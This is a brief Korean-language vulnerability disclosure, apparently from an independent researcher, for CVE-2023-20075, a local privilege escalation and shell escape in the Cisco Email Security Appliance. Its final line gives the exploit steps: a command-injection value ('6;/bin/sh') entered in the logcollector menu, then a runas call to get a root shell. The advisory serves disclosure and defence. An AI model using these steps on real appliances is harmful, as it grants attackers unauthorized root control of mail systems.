
Cisco Email Security Appliance: 로컬 권한 상승 및 셸 탈출
보안 연구원: ly1g3, ly1g3[at]tuta.io
GPG 지문: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
개요: 로컬 권한 상승 및 셸 탈출
CVE: CVE-2023-20075
타임라인:
ESA (Cisco Secure Email)
cli에 접근 권한이 있는 인증된 사용자는 권한을 root로 상승시키고 임의의 코드를 실행할 수 있습니다.
logcollector 명령을 실행합니다.3을 누릅니다.6;/bin/sh/data/release/phoebe-14*/bin/runas 0 /bin/sh